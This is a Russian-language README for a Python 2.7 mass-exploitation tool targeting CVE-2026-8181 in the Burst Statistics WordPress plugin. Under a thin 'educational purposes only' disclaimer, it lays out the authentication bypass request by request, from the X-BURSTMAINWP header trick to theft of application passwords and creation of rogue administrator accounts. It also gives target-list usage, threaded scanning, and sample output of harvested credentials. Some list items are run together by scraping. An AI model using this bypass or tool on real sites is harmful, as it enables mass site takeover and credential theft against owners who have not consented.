
CVE-2026-8181: Обход аутентификации Burst Statistics → захват REST API и создание администратора. Python 2.7. Только в образовательных целях.
Эксплойт для Python 2.7, использующий уязвимость плагина Burst Statistics (CVE-2026-8181), которая позволяет неаутентифицированным атакующим обойти аутентификацию REST API, получить пароли приложений и создавать новых пользователей с правами администратора на уязвимых сайтах WordPress.
⚠️ Отказ от ответственности
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам противозаконен. Используйте его только на сайтах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Дополнительный отказ от ответственности вы можете увидеть на обложке Jenderal92. Ознакомиться с ним можно ЗДЕСЬ !!!
CVE-2026-8181 затрагивает плагин Burst Statistics для WordPress (версии до установки патча). Недостаток кроется в механизме аутентификации REST API и позволяет атакующему:
X-BURSTMAINWP/burst/v1/mainwp-auth/, /wordpress, /wp)/wp-json/wp/v2/users или редиректы по идентификатору автораres_login.txt — краткие учётные данные REST API, разделённые символом | (легко парсить/импортировать)full_res_login.txt — полный отчёт в удобочитаемом виде, включая проверку доступа и пароли приложенийrequestspip install requests
Подготовьте файл со списком целей (по одному домену или IP-адресу в строке, с http:///https:// или без них).
Пример targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Запустите эксплойт:
python2 CVE-2026-8181.py targets.txt
res_login.txt — учётные данные REST API (по одной строке на каждую уязвимую цель)full_res_login.txt — подробный отчёт| Аргумент | Описание |
|---|---|
list.txt | Путь к файлу, содержащему URL-адреса целей |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt — краткие учётные данные REST APIКаждая строка имеет следующий формат с разделителем |:
target|username|password|email|user_id
Пример:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
Этот формат идеально подходит для:
cut, grep или Excelfull_res_login.txt — полный подробный отчётДля каждой уязвимой цели скрипт добавляет блок в удобочитаемом виде:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
Примечание: Если конечная точка пароля приложения недоступна или не возвращает токен, в соответствующем разделе будет указано
FAILED.
http://, если он отсутствует, и удаляет завершающие слэши./, /wordpress и /wp в качестве базовых каталогов WordPress./wp-json/wp/v2/users или использует редиректы ?author=N.X-BURSTMAINWP: 1 вместе с Basic-аутентификацией, используя имя пользователя и фиктивный пароль (CVE-2026-8181). Если конечная точка /wp-json/wp/v2/users/me?context=edit возвращает 200, сайт уязвим./wp-json/burst/v1/mainwp-auth для получения токена пароля приложения./settings, /plugins, /users.POST /wp-json/wp/v2/users.res_login.txt, а полные сведения — в full_res_login.txt.Вы можете изменить следующие переменные внутри скрипта:
THREADS — количество одновременных потоков (по умолчанию 10)BASE_PATHS — дополнительные подкаталоги WordPress для проверкиrequestsЭтот проект предоставляется исключительно в образовательных целях. Используйте на свой страх и риск.